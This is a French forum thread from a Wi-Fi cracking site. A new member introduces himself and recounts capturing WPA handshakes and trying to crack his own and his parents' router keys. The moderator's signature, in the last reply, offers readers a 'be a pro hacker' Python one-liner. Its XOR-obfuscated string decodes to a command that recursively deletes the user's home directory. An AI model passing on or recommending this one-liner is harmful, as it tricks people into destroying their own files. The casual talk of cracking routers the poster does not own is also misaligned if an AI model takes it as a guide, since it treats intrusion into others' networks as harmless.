Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-05-2012 14:37:52

Equador
Nouveau membre

koukou

Bonjours a tous (et a toutes?)

haem, j'me sentais.. obligé de me présenté, disons pour pour éviter aux gens de ne pas avoir l'opportunité de savoir qui je suis quand je post (En fait, vous avez répondu, a travers les tutos, à un tas de questions très intéressantes et surtout très utiles!).
Que j'vous raconte ma petite histoire:

Je débarque dans mon nouvel appartement début avril, j'avais déjà commandé une box et tout.. sauf que bon.. j'me suis lancé un petite challenge, celui de cracker mon code WPA sans le lire.
Mon frère m'avait installé backtrack5 sur mon ordi..j'avais accepté, disons pour lui faire plaisir parce-que linux et moi.. c'est le jour et la nuit (bon j'avoue qu'il rame sur mon PC..[d'ailleurs il ne devrait pas, mon i3 supportant largement les configurations nécessaires] ) mais je m'écarte du sujet.
Après maintes tentatives je n'obtenais jamais le handshake nécessaire. J'ai craqué, j'ai lu le code et j'ai navigué sur internet à la recherche d'informations.
Et...je suis tombé ici sur ce forum.

Apres lecture de nombreux topics et de pas mal de tutos, j'ai réussi a obtenir ce handshake ('fin.. je pense que la chance été au rendez vous) et à cracker mon code (bon.. à vrai dire j'suis pas allé jusqu'au bout, le aircrack était bien trop long) mais c'est une étape que j'ai passé avec brio.

Mais comme vous devez le savoir, quand on commence on ne s'arrête pas, j'ai donc commencé à cracker les livebox/alicebox de mes parents (ouais.. pour voir s'que ça donnait) et la.. problème, jamais de handshake (la cause, je pense la connaitre, les flots de data arrive beaucoup trop lentement malgré mes attaques qui durent.. une nuit!)

enfin, je reste dans la partie présentation et je ne m'attarderai pas sur le sujet.

Sinon.. j'ai 20 ans, je suis étudiant et j'aime l'informatique, alors après m'être longuement intéressé à l'architecture d'un ordinateur, je me devais de comprendre le fonctionnement d'un réseau (malgré le faire que j'ai toujours été une brèle en traitement du signal..) et de pouvoir.. en faire quelque chose smile

Sinon bah, bonjour à tous!!

et je vous remercies de l'aide que vous m'avez déjà apporté

développeur Labview et python.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-05-2012 15:18:08

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : koukou

koukou aussi Equador smile

(bon j'avoue qu'il rame sur mon PC..[d'ailleurs il ne devrait pas, mon i3 supportant largement les configurations nécessaires] )

En effet ce n'est pas normal hmm

#3 08-05-2012 12:38:27

spawn
Modérateur

Re : koukou

koukou

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.019 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]